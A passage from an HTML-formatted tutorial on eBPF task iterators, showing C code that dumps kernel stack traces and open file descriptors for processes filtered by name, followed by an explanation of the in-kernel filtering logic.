&lt;/span&gt;&lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="n"&gt;entries&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;MAX_STACK_TRACE_DEPTH&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{};&lt;/span&gt;
&lt;span class="cp"&gt;#define SIZE_OF_ULONG (sizeof(unsigned long))
&lt;/span&gt;
&lt;span class="cm"&gt;/* Filter: only show stacks for tasks with this name (empty = show all) */&lt;/span&gt;
&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;target_comm&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;""&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;stacks_shown&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;files_shown&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="cm"&gt;/* Task stack iterator */&lt;/span&gt;
&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"iter/task"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;dump_task_stack&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_iter__task&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;seq_file&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;meta&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;task_struct&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;retlen&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;match&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="cm"&gt;/* End of iteration - print summary */&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stacks_shown&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;BPF_SEQ_PRINTF&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;=== Summary: %u task stacks shown ===&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                       &lt;span class="n"&gt;stacks_shown&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Filter by task name if specified */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;target_comm&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="sc"&gt;'\0'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;match&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;target_comm&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sc"&gt;'\0'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;match&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;match&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Get kernel stack trace for this task */&lt;/span&gt;
    &lt;span class="n"&gt;retlen&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_task_stack&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                    &lt;span class="n"&gt;MAX_STACK_TRACE_DEPTH&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;SIZE_OF_ULONG&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;retlen&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;stacks_shown&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Print task info and stack trace */&lt;/span&gt;
    &lt;span class="n"&gt;BPF_SEQ_PRINTF&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"=== Task: %s (pid=%u, tgid=%u) ===&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
               &lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;BPF_SEQ_PRINTF&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Stack depth: %u frames&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;retlen&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="n"&gt;SIZE_OF_ULONG&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;MAX_STACK_TRACE_DEPTH&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;retlen&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;SIZE_OF_ULONG&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;BPF_SEQ_PRINTF&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"  [%2ld] %pB&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;entries&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="n"&gt;BPF_SEQ_PRINTF&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* Task file descriptor iterator */&lt;/span&gt;
&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"iter/task_file"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;dump_task_file&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_iter__task_file&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;seq_file&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;meta&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;task_struct&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;file&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;file&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;fd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;match&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="n"&gt;file&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;files_shown&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;meta&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;seq_num&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;BPF_SEQ_PRINTF&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;=== Summary: %u file descriptors shown ===&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                       &lt;span class="n"&gt;files_shown&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Filter by task name if specified */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;target_comm&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="sc"&gt;'\0'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;match&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;target_comm&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sc"&gt;'\0'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;match&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;match&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;meta&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;seq_num&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;BPF_SEQ_PRINTF&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"%-16s %8s %8s %6s %s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="s"&gt;"COMM"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"TGID"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"PID"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"FD"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"FILE_OPS"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;files_shown&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;BPF_SEQ_PRINTF&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"%-16s %8d %8d %6d 0x%lx&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
               &lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;tgid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
               &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;long&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;file&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;f_op&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding the BPF Code
&lt;/h3&gt;

&lt;p&gt;The program implements two separate iterators sharing common filtering logic. The &lt;code&gt;SEC("iter/task")&lt;/code&gt; annotation registers &lt;code&gt;dump_task_stack&lt;/code&gt; as a task iterator - the kernel will call this function once for each task in the system. The context structure &lt;code&gt;bpf_iter__task&lt;/code&gt; provides three critical pieces: the &lt;code&gt;meta&lt;/code&gt; field containing iteration metadata and the seq_file for output, the &lt;code&gt;task&lt;/code&gt; pointer to the current task_struct, and a NULL task pointer when iteration finishes so you can print summaries.&lt;/p&gt;

&lt;p&gt;The task stack iterator shows in-kernel filtering in action. When &lt;code&gt;task&lt;/code&gt; is NULL, we've reached the end of iteration and can print summary statistics showing how many tasks matched our filter. For each task, we first apply filtering by comparing &lt;code&gt;task-&amp;gt;comm&lt;/code&gt; (the process name) against &lt;code&gt;target_comm&lt;/code&gt;. We can't use standard library functions like &lt;code&gt;strcmp()&lt;/code&gt; in BPF, so we manually loop through characters comparing byte by byte. If the names don't match and filtering is enabled, we immediately return 0 with no output - this task is skipped entirely in the kernel without crossing to userspace.&lt;/p&gt;

